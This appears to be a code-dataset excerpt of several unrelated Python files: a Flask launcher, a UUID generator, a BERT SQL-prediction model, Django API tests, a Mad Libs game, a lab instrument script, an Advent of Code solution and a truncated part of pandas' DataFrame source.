text
stringlengths 2
999k
|
|---|
#! python3
# -*- encoding: utf-8 -*-
'''
Current module: rman.manager
Rough version history:
v1.0 Original version to use
********************************************************************
@AUTHOR: Administrator-Bruce Luo(罗科峰)
MAIL: luokefeng@163.com
RCS: rman.manager, v1.0 2018年11月22日
FROM: 2018年11月22日
********************************************************************
======================================================================
Provide a function for the automation test
'''
from rman.app import create_app, celery, db
from flask_migrate import Migrate
APP = create_app()
migrate = Migrate(APP, db)
celery.set_path()
if __name__ == "__main__":
APP.run(host='0.0.0.0', port=5000, debug=True)
|
#!/usr/bin/python3
# this library allows us to generate uuis values.
import uuid
howmany= int(input("How many UUIDs should be generated? "))
print("Generatting UUIDs...")
# range is required because an int cannot be looped
for rando in range(howmany):
print( uuid.uuid4() )
|
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.configuration_bert import BertConfig
from transformers.modeling_bert import BertLayerNorm, BertPreTrainedModel, gelu, BertModel
COLUMN_SQL_LABEL_COUNT = 502
SQL_DIFF_LABEL_COUNT = 120
class BertForContext(BertPreTrainedModel):
config_class = BertConfig
base_model_prefix = "bert"
def __init__(self, config):
super().__init__(config)
self.bert = BertModel(config)
self.lm_head = BertContextHead(config)
self.q_tab_dense = nn.Linear(config.hidden_size*2, config.hidden_size)
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
masked_lm_labels=None,
masked_col_labels=None,
masked_context_labels=None,
q_tab_inds=None,
is_train=True
):
outputs = self.bert(input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask)
sequence_output = outputs[0]
if q_tab_inds is not None:
q_tab_inds = q_tab_inds.unsqueeze(2).expand_as(sequence_output)
q_tab_output = torch.gather(sequence_output, 1, q_tab_inds)
sequence_output = self.q_tab_dense(torch.cat([sequence_output, q_tab_output], 2))
lm_prediction_scores, col_prediction_scores, context_prediction_scores = self.lm_head(sequence_output)
total_loss = None
if masked_col_labels is not None:
# TODO: weights for labels
weight_list = [0.3] + [1.]*(COLUMN_SQL_LABEL_COUNT-1)
weights = torch.tensor(weight_list).cuda()
weighted_loss_fct = CrossEntropyLoss(weight=weights, ignore_index=-1)
masked_col_loss = weighted_loss_fct(col_prediction_scores.view(-1, COLUMN_SQL_LABEL_COUNT), masked_col_labels.view(-1))
if masked_lm_labels is not None:
loss_fct = CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(lm_prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
if masked_col_labels is not None and masked_lm_labels is not None:
total_loss = 0.8 * masked_col_loss + 0.2 * masked_lm_loss
elif masked_col_labels is not None:
total_loss = masked_col_loss
elif masked_lm_labels is not None:
total_loss = masked_lm_loss
if is_train:
return total_loss
else:
return total_loss, (lm_prediction_scores, col_prediction_scores, context_prediction_scores)
# return outputs # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)
class BertContextHead(nn.Module):
"""Bert Head for masked language modeling."""
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
self.dense_col = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm_col = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder_col = nn.Linear(config.hidden_size, COLUMN_SQL_LABEL_COUNT, bias=False)
self.bias_col = nn.Parameter(torch.zeros(COLUMN_SQL_LABEL_COUNT))
self.dense_context = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm_context = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder_context = nn.Linear(config.hidden_size, SQL_DIFF_LABEL_COUNT, bias=False)
self.bias_context = nn.Parameter(torch.zeros(SQL_DIFF_LABEL_COUNT))
def forward(self, features, **kwargs):
lm_prediction_scores = self.dense(features)
lm_prediction_scores = gelu(lm_prediction_scores)
lm_prediction_scores = self.layer_norm(lm_prediction_scores)
# project back to size of vocabulary with bias
lm_prediction_scores = self.decoder(lm_prediction_scores) + self.bias
col_prediction_scores = self.dense_col(features)
col_prediction_scores = gelu(col_prediction_scores)
col_prediction_scores = self.layer_norm_col(col_prediction_scores)
# project back to size of possible column labels
col_prediction_scores = self.decoder_col(col_prediction_scores) + self.bias_col
context_prediction_scores = self.dense_context(features)
context_prediction_scores = gelu(context_prediction_scores)
context_prediction_scores = self.layer_norm_context(context_prediction_scores)
# project back to size of possible sql diff labels
context_prediction_scores = self.decoder_context(context_prediction_scores) + self.bias_context
return lm_prediction_scores, col_prediction_scores, context_prediction_scores
|
"""(c) All rights reserved. ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE, Switzerland, VPSI, 2017"""
import json
import re
from time import sleep
from django.test import tag
from django.urls import reverse
from rest_framework.test import APITestCase
from api import rancher
from api.redis import flush_all
from api.tests import KERMIT_SCIPER, KERMIT_UNIT
from config.settings.base import get_config
class ViewsTestCase(APITestCase):
def setUp(self):
flush_all()
def tearDown(self):
flush_all()
def test_get_unit_list(self):
response = self.client.get(
reverse('unit-list'),
data={},
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Units not found")
def test_get_user_list(self):
response = self.client.get(
reverse('user-list'),
data={},
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Users not found")
def test_get_user_detail(self):
response = self.client.get(
reverse(viewname='user-detail', args={'user_id': "133134"}),
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "User not found")
def test_get_unit_detail(self):
response = self.client.get(
reverse(viewname='unit-detail', args={'unit_id': KERMIT_UNIT}),
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Unit not found")
def test_post_apikeys(self):
"""
Test the POST method of KeyView
"""
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(content["access_key"]), 20)
self.assertEqual(len(content["secret_key"]), 40)
self.assertEqual(
response['content-type'],
'application/json'
)
def test_get_apikeys(self):
""" Test the GET method of KeyView """
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
response = self.client.get(
reverse('apikey-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(content), 1)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
@tag('rancher')
def test_reset_password(self):
# create an APIKey
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
access_key = content["access_key"]
secret_key = content["secret_key"]
# create a schema
response = self.client.post(
reverse('schema-list'),
data={"access_key": access_key,
"secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
sleep(10)
# reset the password
response = self.client.post(
reverse(
viewname='schema-detail-password',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key},
format='json'
)
self.assertEqual(response.status_code, 200)
@tag('rancher')
def test_post_schemas(self):
""" Test the POST method of Schemas """
# create API Keys
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
access_key = content["access_key"]
secret_key = content["secret_key"]
# create a schema
response = self.client.post(
reverse('schema-list'),
data={"access_key": access_key,
"secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertIsNotNone(re.match('^mysql://\w+:[-\+\w]+@[-\.\w]+:\d+/.+$', content['connection_string']))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
# Get schema
response = self.client.get(
reverse(
viewname='schema-detail',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
self.assertIsNotNone(re.match('^mysql://\w+@[-\.\w]+:\d+/.+$', content['connection_string']))
sleep(10)
# Patch schema
response = self.client.patch(
reverse(
viewname='schema-detail',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key, "unit_id": "13029"},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
self.assertEqual(content["unit_id"], "13029")
# Clean stacks
# Clean stacks
conn = rancher.Rancher()
conn.clean_stacks(KERMIT_SCIPER)
@tag('rancher')
def test_get_schemas(self):
""" Test the GET method of schemas"""
# create an API key
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.client.post(
reverse('schema-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
response = self.client.get(
reverse('schema-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
# we get a list of dicts with 1 element
self.assertEqual(len(content), 1)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
# Clean stacks
conn = rancher.Rancher()
conn.clean_stacks(KERMIT_SCIPER)
def test_get_version(self):
""" Test the GET method of Version """
response = self.client.get(
reverse('version-detail'),
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertIsNotNone(re.match('^\d+\.\d+\.\d+$', content))
|
# Mad Libs Generator - Sagar Kargathra 10/07/2020
"""
mad-libs-project.py
Interactive display of a mad lib, which is provided as a Python format string,
with all the cues being dictionary formats, in the form {cue}.
In this version, the cues are extracted from the story automatically,
and the user is prompted for the replacements.
Original verison adapted from code of Kirby Urner
"""
def getKeys(formatString):
'''formatString is a format string with embedded dictionary keys.
Return a set containing all the keys from the format string.'''
keyList = list()
end = 0
repetitions = formatString.count('{')
for i in range(repetitions):
start = formatString.find('{', end) + 1 # pass the '{'
end = formatString.find('}', start)
key = formatString[start : end]
keyList.append(key) # may add duplicates
return set(keyList) # removes duplicates: no duplicates in a set
def addPick(cue, dictionary): # from madlib.py
'''Prompt for a user response using the cue string,
and place the cue-response pair in the dictionary.
'''
promptFormat = "Enter a specific example for {name}: "
prompt = promptFormat.format(name=cue)
response = input(prompt)
dictionary[cue] = response
def getUserPicks(cues):
'''Loop through the collection of cue keys and get user choices.
Return the resulting dictionary.
'''
userPicks = dict()
for cue in cues:
addPick(cue, userPicks)
return userPicks
def tellStory(storyFormat):
'''storyFormat is a string with Python dictionary references embedded,
in the form {cue}. Prompt the user for the mad lib substitutions
and then print the resulting story with the substitutions.
'''
cues = getKeys(storyFormat)
userPicks = getUserPicks(cues)
story = storyFormat.format(**userPicks)
print(story)
def main():
originalStoryFormat = '''
Once upon a time, deep in an ancient jungle,
there lived a {animal}. This {animal}
liked to eat {food}, but the jungle had
very little {food} to offer. One day, an
explorer found the {animal} and discovered
it liked {food}. The explorer took the
{animal} back to {city}, where it could
eat as much {food} as it wanted. However,
the {animal} became homesick, so the
explorer brought it back to the jungle,
leaving a large supply of {food}.
The End
'''
tellStory(originalStoryFormat)
input("Press Enter to end the program.")
main()
|
from kid_readout.interactive import *
import time
import numpy as np
from equipment.custom import mmwave_source
from equipment.hittite import signal_generator
from equipment.srs import lockin
from xystage import stepper
from kid_readout.equipment import hardware
from kid_readout.measurement import mmw_source_sweep, core, acquire
logger.setLevel(logging.DEBUG)
lockin = lockin.Lockin(LOCKIN_SERIAL_PORT)
tic = time.time()
# lockin.sensitivity = 17
print lockin.identification
print lockin.identification
source = mmwave_source.MMWaveSource()
source.set_attenuator_turns(6.0,6.0)
source.multiplier_input = 'thermal'
source.waveguide_twist_angle = 0
source.ttl_modulation_source = 'roach'
hwp_motor = stepper.SimpleStepper(port='/dev/ttyACM2')
setup = hardware.Hardware(hwp_motor, source, lockin)
ri = Roach2Baseband()
ri.set_modulation_output('low')
#setup = hardware.Hardware()
ri = Roach2Baseband()
#turn on source
ri.set_modulation_output(7)
raw_input('set attenuator knobs to 3 turns & check lock-in range')
for dac_atten in [10]:
ri.set_dac_atten(dac_atten)
df = acquire.new_nc_file(suffix='vna_dac_atten_%.1f_dB_1_turns_chopped' % dac_atten)
swa = acquire.run_sweep(ri,np.linspace(100,180,64)[None,:]+np.arange(650,dtype='int')[:,None]*512./2.**18,
2**18,
verbose=True,length_seconds=.1,
)
df.write(swa)
df.close()
#for example
#170-230 MHz band, steps are (230-170)/128
#then sampling 480 times between each of these steps by stepping an additional 2**18
|
#!/usr/bin/env python3
import functools
def chinese_reminder_theorem(pairs):
n = functools.reduce(lambda a, b: a * b, [pair[0] for pair in pairs])
x = 0
for pair in pairs:
bi = pair[1]
ni = int(n / pair[0])
num = ni % pair[0]
xi = 1
while (xi * num) % pair[0] != 1:
xi += 1
x += bi * ni * xi
return n, x % n
with open("./data/data1") as file:
file_data = file.readlines()
bus_ids = file_data[1][:-1].split(',')
bus_and_minutes = []
for index, bus_id in enumerate(bus_ids):
if bus_id != 'x':
bus_and_minutes.append((int(bus_id), index))
result = chinese_reminder_theorem(bus_and_minutes)
print(result[0] - result[1])
|
"""
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
from __future__ import annotations
import collections
from collections import abc
import datetime
from io import StringIO
import itertools
from textwrap import dedent
from typing import (
IO,
TYPE_CHECKING,
Any,
AnyStr,
Dict,
FrozenSet,
Hashable,
Iterable,
Iterator,
List,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._config import get_option
from pandas._libs import algos as libalgos, lib, properties
from pandas._libs.lib import no_default
from pandas._typing import (
AggFuncType,
ArrayLike,
Axes,
Axis,
CompressionOptions,
Dtype,
FilePathOrBuffer,
FrameOrSeriesUnion,
IndexKeyFunc,
Label,
Level,
Renamer,
StorageOptions,
ValueKeyFunc,
)
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (
Appender,
Substitution,
deprecate_kwarg,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_axis_style_args,
validate_bool_kwarg,
validate_percentile,
)
from pandas.core.dtypes.cast import (
cast_scalar_to_array,
coerce_to_dtypes,
construct_1d_arraylike_from_scalar,
find_common_type,
infer_dtype_from_scalar,
invalidate_string_dtypes,
maybe_cast_to_datetime,
maybe_casted_values,
maybe_convert_platform,
maybe_downcast_to_dtype,
maybe_infer_to_datetimelike,
maybe_upcast,
validate_numeric_casting,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_platform_int,
infer_dtype_from_object,
is_bool_dtype,
is_dataclass,
is_datetime64_any_dtype,
is_dict_like,
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_hashable,
is_integer,
is_integer_dtype,
is_iterator,
is_list_like,
is_named_tuple,
is_object_dtype,
is_scalar,
is_sequence,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.missing import isna, notna
from pandas.core import algorithms, common as com, nanops, ops
from pandas.core.accessor import CachedAccessor
from pandas.core.aggregation import (
aggregate,
reconstruct_func,
relabel_result,
transform,
)
from pandas.core.arrays import Categorical, ExtensionArray
from pandas.core.arrays.sparse import SparseFrameAccessor
from pandas.core.construction import extract_array
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.indexes import base as ibase
from pandas.core.indexes.api import Index, ensure_index, ensure_index_from_sequences
from pandas.core.indexes.multi import MultiIndex, maybe_droplevels
from pandas.core.indexing import check_bool_indexer, convert_to_index_sliceable
from pandas.core.internals import BlockManager
from pandas.core.internals.construction import (
arrays_to_mgr,
dataclasses_to_dicts,
get_names_from_index,
init_dict,
init_ndarray,
masked_rec_array_to_mgr,
reorder_arrays,
sanitize_index,
to_arrays,
)
from pandas.core.reshape.melt import melt
from pandas.core.series import Series
from pandas.io.common import get_filepath_or_buffer
from pandas.io.formats import console, format as fmt
from pandas.io.formats.info import DataFrameInfo
import pandas.plotting
if TYPE_CHECKING:
from pandas.core.groupby.generic import DataFrameGroupBy
from pandas.io.formats.style import Styler
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes="index, columns",
klass="DataFrame",
axes_single_arg="{0 or 'index', 1 or 'columns'}",
axis="""axis : {0 or 'index', 1 or 'columns'}, default 0
If 0 or 'index': apply function to each column.
If 1 or 'columns': apply function to each row.""",
optional_by="""
by : str or list of str
Name or list of names to sort by.
- if `axis` is 0 or `'index'` then `by` may contain index
levels and/or column labels.
- if `axis` is 1 or `'columns'` then `by` may contain column
levels and/or index labels.""",
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame or named Series objects with a database-style join.
The join is done on columns or indexes. If joining columns on
columns, the DataFrame indexes *will be ignored*. Otherwise if joining indexes
on indexes or indexes on a column or columns, the index will be passed on.
Parameters
----------%s
right : DataFrame or named Series
Object to merge with.
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
Type of merge to be performed.
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order.
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order.
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically.
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys.
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : bool, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels.
right_index : bool, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index.
sort : bool, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword).
suffixes : list-like, default is ("_x", "_y")
A length-2 sequence where each element is optionally a string
indicating the suffix to add to overlapping column names in
`left` and `right` respectively. Pass a value of `None` instead
of a string to indicate that the column name from `left` or
`right` should be left as-is, with no suffix. At least one of the
values must not be None.
copy : bool, default True
If False, avoid copy if possible.
indicator : bool or str, default False
If True, adds a column to the output DataFrame called "_merge" with
information on the source of each row. The column can be given a different
name by providing a string argument. The column will have a Categorical
type with the value of "left_only" for observations whose merge key only
appears in the left DataFrame, "right_only" for observations
whose merge key only appears in the right DataFrame, and "both"
if the observation's merge key is found in both DataFrames.
validate : str, optional
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
Returns
-------
DataFrame
A DataFrame of the two merged objects.
See Also
--------
merge_ordered : Merge with optional filling/interpolation.
merge_asof : Merge on nearest keys.
DataFrame.join : Similar method using indices.
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Support for merging named Series objects was added in version 0.24.0
Examples
--------
>>> df1 = pd.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]})
>>> df2 = pd.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]})
>>> df1
lkey value
0 foo 1
1 bar 2
2 baz 3
3 foo 5
>>> df2
rkey value
0 foo 5
1 bar 6
2 baz 7
3 foo 8
Merge df1 and df2 on the lkey and rkey columns. The value columns have
the default suffixes, _x and _y, appended.
>>> df1.merge(df2, left_on='lkey', right_on='rkey')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 1 foo 8
2 foo 5 foo 5
3 foo 5 foo 8
4 bar 2 bar 6
5 baz 3 baz 7
Merge DataFrames df1 and df2 with specified left and right suffixes
appended to any overlapping columns.
>>> df1.merge(df2, left_on='lkey', right_on='rkey',
... suffixes=('_left', '_right'))
lkey value_left rkey value_right
0 foo 1 foo 5
1 foo 1 foo 8
2 foo 5 foo 5
3 foo 5 foo 8
4 bar 2 bar 6
5 baz 3 baz 7
Merge DataFrames df1 and df2, but raise an exception if the DataFrames have
any overlapping columns.
>>> df1.merge(df2, left_on='lkey', right_on='rkey', suffixes=(False, False))
Traceback (most recent call last):
...
ValueError: columns overlap but no suffix specified:
Index(['value'], dtype='object')
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
"""
Two-dimensional, size-mutable, potentially heterogeneous tabular data.
Data structure also contains labeled axes (rows and columns).
Arithmetic operations align on both row and column labels. Can be
thought of as a dict-like container for Series objects. The primary
pandas data structure.
Parameters
----------
data : ndarray (structured or homogeneous), Iterable, dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects. If
data is a dict, column order follows insertion-order.
.. versionchanged:: 0.25.0
If data is a list of dicts, column order follows insertion-order.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided.
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided.
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer.
copy : bool, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input.
See Also
--------
DataFrame.from_records : Constructor from tuples, also record arrays.
DataFrame.from_dict : From dicts of Series, arrays, or dicts.
read_csv : Read a comma-separated values (csv) file into DataFrame.
read_table : Read general delimited file into DataFrame.
read_clipboard : Read text from clipboard into DataFrame.
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]),
... columns=['a', 'b', 'c'])
>>> df2
a b c
0 1 2 3
1 4 5 6
2 7 8 9
"""
_internal_names_set = {"columns", "index"} | NDFrame._internal_names_set
_typ = "dataframe"
@property
def _constructor(self) -> Type[DataFrame]:
return DataFrame
_constructor_sliced: Type[Series] = Series
_deprecations: FrozenSet[str] = NDFrame._deprecations | frozenset([])
_accessors: Set[str] = {"sparse"}
@property
def _constructor_expanddim(self):
# GH#31549 raising NotImplementedError on a property causes trouble
# for `inspect`
def constructor(*args, **kwargs):
raise NotImplementedError("Not supported for DataFrames!")
return constructor
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data=None,
index: Optional[Axes] = None,
columns: Optional[Axes] = None,
dtype: Optional[Dtype] = None,
copy: bool = False,
):
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
if isinstance(data, DataFrame):
data = data._mgr
if isinstance(data, BlockManager):
if index is None and columns is None and dtype is None and copy is False:
# GH#33357 fastpath
NDFrame.__init__(self, data)
return
mgr = self._init_mgr(
data, axes=dict(index=index, columns=columns), dtype=dtype, copy=copy
)
elif isinstance(data, dict):
mgr = init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, ma.MaskedArray):
import numpy.ma.mrecords as mrecords
# masked recarray
if isinstance(data, mrecords.MaskedRecords):
mgr = masked_rec_array_to_mgr(data, index, columns, dtype, copy)
# a masked array
else:
mask = ma.getmaskarray(data)
if mask.any():
data, fill_value = maybe_upcast(data, copy=True)
data.soften_mask() # set hardmask False if it was True
data[mask] = fill_value
else:
data = data.copy()
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
elif isinstance(data, (np.ndarray, Series, Index)):
if data.dtype.names:
data_columns = list(data.dtype.names)
data = {k: data[k] for k in data_columns}
if columns is None:
columns = data_columns
mgr = init_dict(data, index, columns, dtype=dtype)
elif getattr(data, "name", None) is not None:
mgr = init_dict({data.name: data}, index, columns, dtype=dtype)
else:
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
# For data is list-like, or Iterable (will consume into list)
elif isinstance(data, abc.Iterable) and not isinstance(data, (str, bytes)):
if not isinstance(data, (abc.Sequence, ExtensionArray)):
data = list(data)
if len(data) > 0:
if is_dataclass(data[0]):
data = dataclasses_to_dicts(data)
if is_list_like(data[0]) and getattr(data[0], "ndim", 1) == 1:
if is_named_tuple(data[0]) and columns is None:
columns = data[0]._fields
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
# set the index
if index is None:
if isinstance(data[0], Series):
index = get_names_from_index(data)
elif isinstance(data[0], Categorical):
index = ibase.default_index(len(data[0]))
else:
index = ibase.default_index(len(data))
mgr = arrays_to_mgr(arrays, columns, index, columns, dtype=dtype)
else:
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
else:
mgr = init_dict({}, index, columns, dtype=dtype)
# For data is scalar
else:
if index is None or columns is None:
raise ValueError("DataFrame constructor not properly called!")
if not dtype:
dtype, _ = infer_dtype_from_scalar(data, pandas_dtype=True)
# For data is a scalar extension dtype
if is_extension_array_dtype(dtype):
values = [
construct_1d_arraylike_from_scalar(data, len(index), dtype)
for _ in range(len(columns))
]
mgr = arrays_to_mgr(values, columns, index, columns, dtype=None)
else:
# Attempt to coerce to a numpy array
try:
arr = np.array(data, dtype=dtype, copy=copy)
except (ValueError, TypeError) as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
if arr.ndim != 0:
raise ValueError("DataFrame constructor not properly called!")
values = cast_scalar_to_array(
(len(index), len(columns)), data, dtype=dtype
)
mgr = init_ndarray(
values, index, columns, dtype=values.dtype, copy=False
)
NDFrame.__init__(self, mgr)
# ----------------------------------------------------------------------
@property
def axes(self) -> List[Index]:
"""
Return a list representing the axes of the DataFrame.
It has the row axis labels and column axis labels as the only members.
They are returned in that order.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.axes
[RangeIndex(start=0, stop=2, step=1), Index(['col1', 'col2'],
dtype='object')]
"""
return [self.index, self.columns]
@property
def shape(self) -> Tuple[int, int]:
"""
Return a tuple representing the dimensionality of the DataFrame.
See Also
--------
ndarray.shape
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.shape
(2, 2)
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4],
... 'col3': [5, 6]})
>>> df.shape
(2, 3)
"""
return len(self.index), len(self.columns)
@property
def _is_homogeneous_type(self) -> bool:
"""
Whether all the columns in a DataFrame have the same type.
Returns
-------
bool
See Also
--------
Index._is_homogeneous_type : Whether the object has a single
dtype.
MultiIndex._is_homogeneous_type : Whether all the levels of a
MultiIndex have the same dtype.
Examples
--------
>>> DataFrame({"A": [1, 2], "B": [3, 4]})._is_homogeneous_type
True
>>> DataFrame({"A": [1, 2], "B": [3.0, 4.0]})._is_homogeneous_type
False
Items with the same type but different sizes are considered
different types.
>>> DataFrame({
... "A": np.array([1, 2], dtype=np.int32),
... "B": np.array([1, 2], dtype=np.int64)})._is_homogeneous_type
False
"""
if self._mgr.any_extension_types:
return len({block.dtype for block in self._mgr.blocks}) == 1
else:
return not self._is_mixed_type
@property
def _can_fast_transpose(self) -> bool:
"""
Can we transpose this DataFrame without creating any new array objects.
"""
if self._mgr.any_extension_types:
# TODO(EA2D) special case would be unnecessary with 2D EAs
return False
return len(self._mgr.blocks) == 1
# ----------------------------------------------------------------------
# Rendering Methods
def _repr_fits_vertical_(self) -> bool:
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
def _repr_fits_horizontal_(self, ignore_width: bool = False) -> bool:
"""
Check if full repr fits in horizontal boundaries imposed by the display
options width and max_columns.
In case of non-interactive session, no boundaries apply.
`ignore_width` is here so ipynb+HTML output can behave the way
users expect. display.max_columns remains in effect.
GH3541, GH3573
"""
width, height = console.get_console_size()
max_columns = get_option("display.max_columns")
nb_columns = len(self.columns)
# exceed max columns
if (max_columns and nb_columns > max_columns) or (
(not ignore_width) and width and nb_columns > (width // 2)
):
return False
# used by repr_html under IPython notebook or scripts ignore terminal
# dims
if ignore_width or not console.in_interactive_session():
return True
if get_option("display.width") is not None or console.in_ipython_frontend():
# check at least the column row for excessive width
max_rows = 1
else:
max_rows = get_option("display.max_rows")
# when auto-detecting, so width=None and not in ipython front end
# check whether repr fits horizontal by actually checking
